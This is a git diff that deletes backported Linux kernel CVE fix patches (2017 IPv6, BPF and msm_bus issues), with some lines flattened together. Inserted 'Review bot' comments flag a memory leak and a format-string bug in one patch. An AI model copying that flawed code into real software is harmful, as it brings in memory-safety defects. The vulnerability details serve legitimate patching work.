packet_len) -+ return -EINVAL; -+ - exthdr = (struct ipv6_opt_hdr *)(skb_network_header(skb) + - offset); -+ offset += ipv6_optlen(exthdr); -+ *nexthdr = &exthdr->nexthdr; - } - -- return offset; -+ return -EINVAL; - } - EXPORT_SYMBOL(ip6_find_1stfragopt); - -diff --git a/net/ipv6/udp_offload.c b/net/ipv6/udp_offload.c -index ac858c4..b348cff 100644 ---- a/net/ipv6/udp_offload.c -+++ b/net/ipv6/udp_offload.c -@@ -91,6 +91,8 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, - * bytes to insert fragment header. - */ - unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr); -+ if (unfrag_ip6hlen < 0) -+ return ERR_PTR(unfrag_ip6hlen); - nexthdr = *prevhdr; - *prevhdr = NEXTHDR_FRAGMENT; - unfrag_len = (skb_network_header(skb) - skb_mac_header(skb)) + --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-9075/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9075/^4.11/0001.patch deleted file mode 100644 index 238ab02f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9075/^4.11/0001.patch +++ /dev/null 
@@ -1,33 +0,0 @@
-From fdcee2cbb8438702ea1b328fb6e0ac5e9a40c7f8 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Wed, 17 May 2017 07:16:40 -0700
-Subject: sctp: do not inherit ipv6_{mc|ac|fl}_list from parent
-
-SCTP needs fixes similar to 83eaddab4378 ("ipv6/dccp: do not inherit
-ipv6_mc_list from parent"), otherwise bad things can happen.
-
-Signed-off-by: Eric Dumazet
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Signed-off-by: David S. Miller
----
- net/sctp/ipv6.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/sctp/ipv6.c b/net/sctp/ipv6.c
-index 142b70e..f5b45b8 100644
---- a/net/sctp/ipv6.c
-+++ b/net/sctp/ipv6.c
-@@ -677,6 +677,9 @@ static struct sock *sctp_v6_create_accept_sk(struct sock *sk,
- newnp = inet6_sk(newsk);
-
- memcpy(newnp, np, sizeof(struct ipv6_pinfo));
-+ newnp->ipv6_mc_list = NULL;
-+ newnp->ipv6_ac_list = NULL;
-+ newnp->ipv6_fl_list = NULL;
-
- rcu_read_lock();
- opt = rcu_dereference(np->opt);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9076/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9076/^4.11/0001.patch
deleted file mode 100644
index 828a8905..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9076/^4.11/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 83eaddab4378db256d00d295bda6ca997cd13a52 Mon Sep 17 00:00:00 2001
-From: WANG Cong
-Date: Tue, 9 May 2017 16:59:54 -0700
-Subject: ipv6/dccp: do not inherit ipv6_mc_list from parent
-
-Like commit 657831ffc38e ("dccp/tcp: do not inherit mc_list from parent")
-we should clear ipv6_mc_list etc. for IPv6 sockets too.
-
-Cc: Eric Dumazet
-Signed-off-by: Cong Wang
-Acked-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/dccp/ipv6.c | 6 ++++++
- net/ipv6/tcp_ipv6.c | 2 ++
- 2 files changed, 8 insertions(+)
-
-diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
-index d9b6a4e..b6bbb71 100644
---- a/net/dccp/ipv6.c
-+++ b/net/dccp/ipv6.c
-@@ -426,6 +426,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- newsk->sk_backlog_rcv = dccp_v4_do_rcv;
- newnp->pktoptions = NULL;
- newnp->opt = NULL;
-+ newnp->ipv6_mc_list = NULL;
-+ newnp->ipv6_ac_list = NULL;
-+ newnp->ipv6_fl_list = NULL;
- newnp->mcast_oif = inet6_iif(skb);
- newnp->mcast_hops = ipv6_hdr(skb)->hop_limit;
-
-@@ -490,6 +493,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- /* Clone RX bits */
- newnp->rxopt.all = np->rxopt.all;
-
-+ newnp->ipv6_mc_list = NULL;
-+ newnp->ipv6_ac_list = NULL;
-+ newnp->ipv6_fl_list = NULL;
- newnp->pktoptions = NULL;
- newnp->opt = NULL;
- newnp->mcast_oif = inet6_iif(skb);
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index aeb9497..df5a9ff 100644
---- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -1062,6 +1062,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- newtp->af_specific = &tcp_sock_ipv6_mapped_specific;
- #endif
-
-+ newnp->ipv6_mc_list = NULL;
- newnp->ipv6_ac_list = NULL;
- newnp->ipv6_fl_list = NULL;
- newnp->pktoptions = NULL;
-@@ -1131,6 +1132,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- First: no IPv4 options.
- */
- newinet->inet_opt = NULL;
-+ newnp->ipv6_mc_list = NULL;
- newnp->ipv6_ac_list = NULL;
- newnp->ipv6_fl_list = NULL;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9077/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9077/^4.11/0001.patch
deleted file mode 100644
index 828a8905..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9077/^4.11/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 83eaddab4378db256d00d295bda6ca997cd13a52 Mon Sep 17 00:00:00 2001
-From: WANG Cong
-Date: Tue, 9 May 2017 16:59:54 -0700
-Subject: ipv6/dccp: do not inherit ipv6_mc_list from parent
-
-Like commit 657831ffc38e ("dccp/tcp: do not inherit mc_list from parent")
-we should clear ipv6_mc_list etc. for IPv6 sockets too.
-
-Cc: Eric Dumazet
-Signed-off-by: Cong Wang
-Acked-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/dccp/ipv6.c | 6 ++++++
- net/ipv6/tcp_ipv6.c | 2 ++
- 2 files changed, 8 insertions(+)
-
-diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
-index d9b6a4e..b6bbb71 100644
---- a/net/dccp/ipv6.c
-+++ b/net/dccp/ipv6.c
-@@ -426,6 +426,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- newsk->sk_backlog_rcv = dccp_v4_do_rcv;
- newnp->pktoptions = NULL;
- newnp->opt = NULL;
-+ newnp->ipv6_mc_list = NULL;
-+ newnp->ipv6_ac_list = NULL;
-+ newnp->ipv6_fl_list = NULL;
- newnp->mcast_oif = inet6_iif(skb);
- newnp->mcast_hops = ipv6_hdr(skb)->hop_limit;
-
-@@ -490,6 +493,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- /* Clone RX bits */
- newnp->rxopt.all = np->rxopt.all;
-
-+ newnp->ipv6_mc_list = NULL;
-+ newnp->ipv6_ac_list = NULL;
-+ newnp->ipv6_fl_list = NULL;
- newnp->pktoptions = NULL;
- newnp->opt = NULL;
- newnp->mcast_oif = inet6_iif(skb);
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index aeb9497..df5a9ff 100644
---- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -1062,6 +1062,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- newtp->af_specific = &tcp_sock_ipv6_mapped_specific;
- #endif
-
-+ newnp->ipv6_mc_list = NULL;
- newnp->ipv6_ac_list = NULL;
- newnp->ipv6_fl_list = NULL;
- newnp->pktoptions = NULL;
-@@ -1131,6 +1132,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- First: no IPv4 options.
- */
- newinet->inet_opt = NULL;
-+ newnp->ipv6_mc_list = NULL;
- newnp->ipv6_ac_list = NULL;
- newnp->ipv6_fl_list = NULL;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9150/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9150/^4.11/0001.patch
deleted file mode 100644
index aac6bc7c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9150/^4.11/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 0d0e57697f162da4aa218b5feafe614fb666db07 Mon Sep 17 00:00:00 2001
-From: Daniel Borkmann
-Date: Mon, 8 May 2017 00:04:09 +0200
-Subject: bpf: don't let ldimm64 leak map addresses on unprivileged
-
-The patch fixes two things at once:
-
-1) It checks the env->allow_ptr_leaks and only prints the map address to
- the log if we have the privileges to do so, otherwise it just dumps 0
- as we would when kptr_restrict is enabled on %pK. Given the latter is
- off by default and not every distro sets it, I don't want to rely on
- this, hence the 0 by default for unprivileged.
-
-2) Printing of ldimm64 in the verifier log is currently broken in that
- we don't print the full immediate, but only the 32 bit part of the
- first insn part for ldimm64. Thus, fix this up as well; it's okay to
- access, since we verified all ldimm64 earlier already (including just
- constants) through replace_map_fd_with_map_ptr().
-
-Fixes: 1be7f75d1668 ("bpf: enable non-root eBPF programs")
-Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification log)")
-Reported-by: Jann Horn
-Signed-off-by: Daniel Borkmann
-Acked-by: Alexei Starovoitov
-Signed-off-by: David S. Miller
----
- kernel/bpf/verifier.c | 21 ++++++++++++++++-----
- 1 file changed, 16 insertions(+), 5 deletions(-)
-
-diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
-index c2ff608..c5b56c9 100644
---- a/kernel/bpf/verifier.c
-+++ b/kernel/bpf/verifier.c
-@@ -298,7 +298,8 @@ static const char *const bpf_jmp_string[16] = {
- [BPF_EXIT >> 4] = "exit",
- };
-
--static void print_bpf_insn(struct bpf_insn *insn)
-+static void print_bpf_insn(const struct bpf_verifier_env *env,
-+ const struct bpf_insn *insn)
- {
- u8 class = BPF_CLASS(insn->code);
-
-@@ -362,9 +363,19 @@ static void print_bpf_insn(struct bpf_insn *insn)
- insn->code,
- bpf_ldst_string[BPF_SIZE(insn->code) >> 3],
- insn->src_reg, insn->imm);
-- } else if (BPF_MODE(insn->code) == BPF_IMM) {
-- verbose("(%02x) r%d = 0x%x\n",
-- insn->code, insn->dst_reg, insn->imm);
-+ } else if (BPF_MODE(insn->code) == BPF_IMM &&
-+ BPF_SIZE(insn->code) == BPF_DW) {
-+ /* At this point, we already made sure that the second
-+ * part of the ldimm64 insn is accessible.
-+ */
-+ u64 imm = ((u64)(insn + 1)->imm << 32) | (u32)insn->imm;
-+ bool map_ptr = insn->src_reg == BPF_PSEUDO_MAP_FD;
-+
-+ if (map_ptr && !env->allow_ptr_leaks)
-+ imm = 0;
-+
-+ verbose("(%02x) r%d = 0x%llx\n", insn->code,
-+ insn->dst_reg, (unsigned long long)imm);
- } else {
- verbose("BUG_ld_%02x\n", insn->code);
- return;
-@@ -2853,7 +2864,7 @@ static int do_check(struct bpf_verifier_env *env)
-
- if (log_level) {
- verbose("%d: ", insn_idx);
-- print_bpf_insn(insn);
-+ print_bpf_insn(env, insn);
- }
-
- err = ext_analyzer_insn_hook(env, insn_idx, prev_insn_idx);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9242/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9242/^4.11/0001.patch
deleted file mode 100644
index 247b5b64..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9242/^4.11/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@ -From 232cd35d0804cc241eb887bb8d4d9b3b9881c64a Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Fri, 19 May 2017 14:17:48 -0700 -Subject: [PATCH] ipv6: fix out of bound writes in __ip6_append_data() - -Andrey Konovalov and idaifish@gmail.com reported crashes caused by -one skb shared_info being overwritten from __ip6_append_data() - -Andrey program lead to following state : - -copy -4200 datalen 2000 fraglen 2040 -maxfraglen 2040 alloclen 2048 transhdrlen 0 offset 0 fraggap 6200 - -The skb_copy_and_csum_bits(skb_prev, maxfraglen, data + transhdrlen, -fraggap, 0); is overwriting skb->head and skb_shared_info - -Since we apparently detect this rare condition too late, move the -code earlier to even avoid allocating skb and risking crashes. - -Once again, many thanks to Andrey and syzkaller team. - -Signed-off-by: Eric Dumazet -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -Reported-by: -Signed-off-by: David S. Miller ---- - net/ipv6/ip6_output.c | 15 ++++++++------- - 1 file changed, 8 insertions(+), 7 deletions(-) - -diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c -index d4a31becbd25d..bf8a58a1c32d8 100644 ---- a/net/ipv6/ip6_output.c -+++ b/net/ipv6/ip6_output.c -@@ -1466,6 +1466,11 @@ static int __ip6_append_data(struct sock *sk, - */ - alloclen += sizeof(struct frag_hdr); - -+ copy = datalen - transhdrlen - fraggap; -+ if (copy < 0) { -+ err = -EINVAL; -+ goto error; -+ } - if (transhdrlen) { - skb = sock_alloc_send_skb(sk, - alloclen + hh_len, -@@ -1515,13 +1520,9 @@ static int __ip6_append_data(struct sock *sk, - data += fraggap; - pskb_trim_unique(skb_prev, maxfraglen); - } -- copy = datalen - transhdrlen - fraggap; -- -- if (copy < 0) { -- err = -EINVAL; -- kfree_skb(skb); -- goto error; -- } else if (copy > 0 && getfrag(from, data + transhdrlen, offset, copy, fraggap, skb) < 0) { -+ if (copy > 0 && -+ getfrag(from, data + transhdrlen, offset, -+ copy, fraggap, skb) < 0) { - err = -EFAULT; - kfree_skb(skb); - goto 
error;
diff --git a/Patches/Linux_CVEs/CVE-2017-9676/3.0+/0001.patch b/Patches/Linux_CVEs/CVE-2017-9676/3.0+/0001.patch
deleted file mode 100644
index 44facbac..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9676/3.0+/0001.patch
+++ /dev/null
@@ -1,272 +0,0 @@ -From d109d8d7e2998a635406215a559e298fa7ef4bb8 Mon Sep 17 00:00:00 2001 -From: "lianwei.wang" -Date: Fri, 30 Mar 2012 12:05:50 +0800 -Subject: [PATCH] IKHSS7-18791 msm:fix the list usage in msm_bus_dbg - -The list usage in msm_bus_dbg driver are not correct which will cause -kernel panic. - . The list operation should be protected by a lock, e.g. mutex_lock. - . The list entry should only be operated on a valid entry. - -Change-Id: I19efeb346d1bacf129ccfd7a6511bc795c029afc -Signed-off-by: Lianwei Wang -Reviewed-on: http://gerrit.pcs.mot.com/384275 -Reviewed-by: Guo-Jian Chen -Reviewed-by: Ke Lv -Tested-by: Jira Key -Reviewed-by: Jeffrey Carlyle -Reviewed-by: Check Patch -Reviewed-by: Klocwork kwcheck -Reviewed-by: Tao Hu ---- - arch/arm/mach-msm/msm_bus/msm_bus_dbg.c | 74 ++++++++++++++++++++++++++------- - 1 file changed, 58 insertions(+), 16 deletions(-) - -diff --git a/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c b/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c -index abd986bca68..76173529d35 100644 ---- a/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c -+++ b/arch/arm/mach-msm/msm_bus/msm_bus_dbg.c -@@ -28,6 +28,7 @@ - static struct dentry *clients; - static struct dentry *dir; - static DEFINE_MUTEX(msm_bus_dbg_fablist_lock); -+static DEFINE_MUTEX(msm_bus_dbg_cllist_lock); - struct msm_bus_dbg_state { - uint32_t cl; - uint8_t enable; -@@ -271,16 +272,21 @@ static ssize_t client_data_read(struct file *file, char __user *buf, - size_t count, loff_t *ppos) - { - int bsize = 0; -+ ssize_t read_count = 0; - uint32_t cl = (uint32_t)file->private_data; - struct msm_bus_cldata *cldata = NULL; - -+ mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { -- if (cldata->clid == cl) -+ if (cldata->clid == cl) { -+ bsize = cldata->size; -+ read_count = simple_read_from_buffer(buf, count, ppos, -+ cldata->buffer, bsize); - break; -+ } - } -- bsize = cldata->size; -- return simple_read_from_buffer(buf, count, ppos, -- cldata->buffer, bsize); -+ 
mutex_unlock(&msm_bus_dbg_cllist_lock); -+ return read_count; - } - - static int client_data_open(struct inode *inode, struct file *file) -@@ -310,9 +316,11 @@ static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata, - { - struct msm_bus_cldata *cldata; - -+ mutex_lock(&msm_bus_dbg_cllist_lock); - cldata = kmalloc(sizeof(struct msm_bus_cldata), GFP_KERNEL); - if (!cldata) { - MSM_BUS_DBG("Failed to allocate memory for client data\n"); -+ mutex_unlock(&msm_bus_dbg_cllist_lock); - return -ENOMEM; - } - cldata->pdata = pdata; -@@ -321,6 +329,7 @@ static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata, - cldata->file = file; - cldata->size = 0; - list_add_tail(&cldata->list, &cl_list); -+ mutex_unlock(&msm_bus_dbg_cllist_lock); - return 0; - } - -@@ -328,6 +337,7 @@ static void msm_bus_dbg_free_client(uint32_t clid) - { - struct msm_bus_cldata *cldata = NULL; - -+ mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->clid == clid) { - debugfs_remove(cldata->file); -@@ -336,23 +346,34 @@ static void msm_bus_dbg_free_client(uint32_t clid) - break; - } - } -+ mutex_unlock(&msm_bus_dbg_cllist_lock); - } - - static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata, - int index, uint32_t clid) - { -- int i = 0, j; -+ int i = 0, j, found = 0; - char *buf = NULL; - struct msm_bus_cldata *cldata = NULL; - struct timespec ts; - -+ mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { -- if (cldata->clid == clid) -+ if (cldata->clid == clid) { -+ found = 1; - break; -+ } -+ } -+ -+ if (!found) { -+ MSM_BUS_DBG("Client(clid=%d) doesn't exist\n", clid); -+ mutex_unlock(&msm_bus_dbg_cllist_lock); -+ return -EINVAL; - } - if (cldata->file == NULL) { - if (pdata->name == NULL) { - MSM_BUS_DBG("Client doesn't have a name\n"); -+ mutex_unlock(&msm_bus_dbg_cllist_lock); - return -EINVAL; - } - cldata->file = msm_bus_dbg_create(pdata->name, S_IRUGO, 
-@@ -390,6 +411,9 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata, - i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n"); - - cldata->size = i; -+ -+ mutex_unlock(&msm_bus_dbg_cllist_lock); -+ - return i; - } - -@@ -426,6 +450,7 @@ static ssize_t msm_bus_dbg_update_request_write(struct file *file, - chid = buf; - MSM_BUS_DBG("buffer: %s\n size: %d\n", buf, sizeof(ubuf)); - -+ mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (strstr(chid, cldata->pdata->name)) { - cldata = cldata; -@@ -435,16 +460,19 @@ static ssize_t msm_bus_dbg_update_request_write(struct file *file, - if (ret) { - MSM_BUS_DBG("Index conversion" - " failed\n"); -+ mutex_unlock(&msm_bus_dbg_cllist_lock); - return -EFAULT; - } - } else - MSM_BUS_DBG("Error parsing input. Index not" - " found\n"); -+ msm_bus_dbg_update_request(cldata, index); - break; - } - } - -- msm_bus_dbg_update_request(cldata, index); -+ mutex_unlock(&msm_bus_dbg_cllist_lock); -+ - kfree(buf); - return cnt; - } -@@ -458,17 +486,18 @@ static ssize_t fabric_data_read(struct file *file, char __user *buf, - { - struct msm_bus_fab_list *fablist = NULL; - int bsize = 0; -- ssize_t ret; -+ ssize_t ret = 0; - const char *name = file->private_data; - - mutex_lock(&msm_bus_dbg_fablist_lock); - list_for_each_entry(fablist, &fabdata_list, list) { -- if (strcmp(fablist->name, name) == 0) -+ if (strcmp(fablist->name, name) == 0) { -+ bsize = fablist->size; -+ ret = simple_read_from_buffer(buf, count, ppos, -+ fablist->buffer, bsize); - break; -+ } - } -- bsize = fablist->size; -- ret = simple_read_from_buffer(buf, count, ppos, -- fablist->buffer, bsize); - mutex_unlock(&msm_bus_dbg_fablist_lock); - return ret; - } -@@ -519,16 +548,25 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname, - void *cdata, int nmasters, int nslaves, - int ntslaves) - { -- int i; -+ int i, found = 0; - char *buf = NULL; - struct msm_bus_fab_list *fablist = NULL; - struct timespec ts; - 
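Review bot: The `return -EFAULT;` on the "Index conversion failed" path of msm_bus_dbg_update_request_write now drops the new mutex but still leaves without freeing `buf`, which the normal exit releases with `kfree(buf)`; assuming `buf` is allocated earlier in the function (outside the hunk), every failed write to this debugfs file leaks one allocation. The error path should release it too, for example `mutex_unlock(&msm_bus_dbg_cllist_lock); kfree(buf); return -EFAULT;`, or both exits should go through one unlock-and-free label. The relocated `msm_bus_dbg_update_request(cldata, index);` also sits after the unbraced `else`, so it still runs when no index was parsed; whether `index` holds a defined value there depends on its declaration, which is not in the hunk.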
- mutex_lock(&msm_bus_dbg_fablist_lock); - list_for_each_entry(fablist, &fabdata_list, list) { -- if (strcmp(fablist->name, fabname) == 0) -+ if (strcmp(fablist->name, fabname) == 0) { -+ found = 1; - break; -+ } -+ } -+ -+ if (!found) { -+ MSM_BUS_DBG("Fabric dbg entry %s does not exist, fabname\n"); -+ mutex_unlock(&msm_bus_dbg_fablist_lock); -+ return -EINVAL; - } -+ - if (fablist->file == NULL) { - MSM_BUS_DBG("Fabric dbg entry does not exist\n"); - mutex_unlock(&msm_bus_dbg_fablist_lock); -@@ -542,7 +580,6 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname, - fablist->size = 0; - } - buf = fablist->buffer; -- mutex_unlock(&msm_bus_dbg_fablist_lock); - ts = ktime_to_timespec(ktime_get()); - i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n%d.%d\n", - (int)ts.tv_sec, (int)ts.tv_nsec); -@@ -550,7 +587,6 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname, - msm_bus_rpm_fill_cdata_buffer(&i, buf + i, MAX_BUFF_SIZE, cdata, - nmasters, nslaves, ntslaves); - i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n"); -- mutex_lock(&msm_bus_dbg_fablist_lock); - fablist->size = i; - mutex_unlock(&msm_bus_dbg_fablist_lock); - return 0; -@@ -660,6 +696,7 @@ static int __init msm_bus_debugfs_init(void) - clients, NULL, &msm_bus_dbg_update_request_fops) == NULL) - goto err; - -+ mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->pdata->name == NULL) { - MSM_BUS_DBG("Client name not found\n"); -@@ -668,6 +705,7 @@ static int __init msm_bus_debugfs_init(void) - cldata->file = msm_bus_dbg_create(cldata-> - pdata->name, S_IRUGO, clients, cldata->clid); - } -+ mutex_unlock(&msm_bus_dbg_cllist_lock); - - mutex_lock(&msm_bus_dbg_fablist_lock); - list_for_each_entry(fablist, &fabdata_list, list) { -@@ -675,6 +713,7 @@ static int __init msm_bus_debugfs_init(void) - commit, (void *)fablist->name, &fabric_data_fops); - if (fablist->file == NULL) { - MSM_BUS_DBG("Cannot create files for commit data\n"); -+ 
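Review bot: The added not-found message in msm_bus_dbg_fill_fab_buffer has the variable name inside the string literal, `MSM_BUS_DBG("Fabric dbg entry %s does not exist, fabname\n");`, so `%s` has no matching argument. If MSM_BUS_DBG expands to a printk-style call (its definition is not part of the patch), the formatter reads an unrelated value as a string pointer whenever debug output is enabled, which can fault or copy unintended kernel memory into the log. It should read `MSM_BUS_DBG("Fabric dbg entry %s does not exist\n", fabname);`. The function body continues beyond this hunk.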
mutex_unlock(&msm_bus_dbg_fablist_lock); - goto err; - } - } -@@ -694,10 +733,13 @@ static void __exit msm_bus_dbg_teardown(void) - struct msm_bus_cldata *cldata = NULL, *cldata_temp; - - debugfs_remove_recursive(dir); -+ mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry_safe(cldata, cldata_temp, &cl_list, list) { - list_del(&cldata->list); - kfree(cldata); - } -+ mutex_unlock(&msm_bus_dbg_cllist_lock); -+ - mutex_lock(&msm_bus_dbg_fablist_lock); - list_for_each_entry_safe(fablist, fablist_temp, &fabdata_list, list) { - list_del(&fablist->list); diff --git a/Patches/Linux_CVEs/CVE-2017-9676/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-9676/3.18/0002.patch deleted file mode 100644 index a63b017b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9676/3.18/0002.patch +++ /dev/null 
@@ -1,347 +0,0 @@ -From c1f749639030305a3b02185c180240a8195fb715 Mon Sep 17 00:00:00 2001 -From: Maria Yu -Date: Fri, 21 Apr 2017 16:06:14 +0800 -Subject: soc: qcom: msm_bus: add mutex lock for cllist data - -Cldata needed to be protected by lock since crash -happened when synchronous update and free. - -CRs-Fixed: 2034222 -Change-Id: Ied86461b784d69d9758dc3fc793a8a0de86e7f9c -Signed-off-by: Maria Yu ---- - drivers/platform/msm/msm_bus/msm_bus_dbg.c | 102 +++++++++++++++++++++-------- - 1 file changed, 76 insertions(+), 26 deletions(-) - -diff --git a/drivers/platform/msm/msm_bus/msm_bus_dbg.c b/drivers/platform/msm/msm_bus/msm_bus_dbg.c -index 88ba186..8db3a62 100644 ---- a/drivers/platform/msm/msm_bus/msm_bus_dbg.c -+++ b/drivers/platform/msm/msm_bus/msm_bus_dbg.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2010-2012, 2014-2015, The Linux Foundation. All rights -+/* Copyright (c) 2010-2012, 2014-2015, 2017 The Linux Foundation. All rights - * reserved. - * - * This program is free software; you can redistribute it and/or modify -@@ -38,6 +38,7 @@ - static struct dentry *clients; - static struct dentry *dir; - static DEFINE_MUTEX(msm_bus_dbg_fablist_lock); -+static DEFINE_RT_MUTEX(msm_bus_dbg_cllist_lock); - struct msm_bus_dbg_state { - uint32_t cl; - uint8_t enable; -@@ -289,7 +290,9 @@ static ssize_t client_data_read(struct file *file, char __user *buf, - struct msm_bus_cldata *cldata = NULL; - const struct msm_bus_client_handle *handle = file->private_data; - int found = 0; -+ ssize_t ret; - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if ((cldata->clid == cl) || - (cldata->handle && (cldata->handle == handle))) { -@@ -298,12 +301,17 @@ static ssize_t client_data_read(struct file *file, char __user *buf, - } - } - -- if (!found) -+ if (!found) { -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - return 0; -+ } - - bsize = cldata->size; -- return simple_read_from_buffer(buf, count, ppos, -+ ret = simple_read_from_buffer(buf, 
count, ppos, - cldata->buffer, bsize); -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); -+ -+ return ret; - } - - static int client_data_open(struct inode *inode, struct file *file) -@@ -339,7 +347,9 @@ int msm_bus_dbg_add_client(const struct msm_bus_client_handle *pdata) - return -ENOMEM; - } - cldata->handle = pdata; -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_add_tail(&cldata->list, &cl_list); -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - return 0; - } - -@@ -352,6 +362,7 @@ int msm_bus_dbg_rec_transaction(const struct msm_bus_client_handle *pdata, - bool found = false; - char *buf = NULL; - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->handle == pdata) { - found = true; -@@ -359,12 +370,15 @@ int msm_bus_dbg_rec_transaction(const struct msm_bus_client_handle *pdata, - } - } - -- if (!found) -+ if (!found) { -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - return -ENOENT; -+ } - - if (cldata->file == NULL) { - if (pdata->name == NULL) { - MSM_BUS_DBG("Client doesn't have a name\n"); -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - return -EINVAL; - } - cldata->file = debugfs_create_file(pdata->name, S_IRUGO, -@@ -393,6 +407,7 @@ int msm_bus_dbg_rec_transaction(const struct msm_bus_client_handle *pdata, - i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "%llu ", ib); - i += scnprintf(buf + i, MAX_BUFF_SIZE - i, "\n"); - cldata->size = i; -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - - trace_bus_update_request((int)ts.tv_sec, (int)ts.tv_nsec, - pdata->name, pdata->mas, pdata->slv, ab, ib); -@@ -404,6 +419,7 @@ void msm_bus_dbg_remove_client(const struct msm_bus_client_handle *pdata) - { - struct msm_bus_cldata *cldata = NULL; - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->handle == pdata) { - debugfs_remove(cldata->file); -@@ -412,6 +428,7 @@ void msm_bus_dbg_remove_client(const struct msm_bus_client_handle *pdata) - break; - } - } -+ 
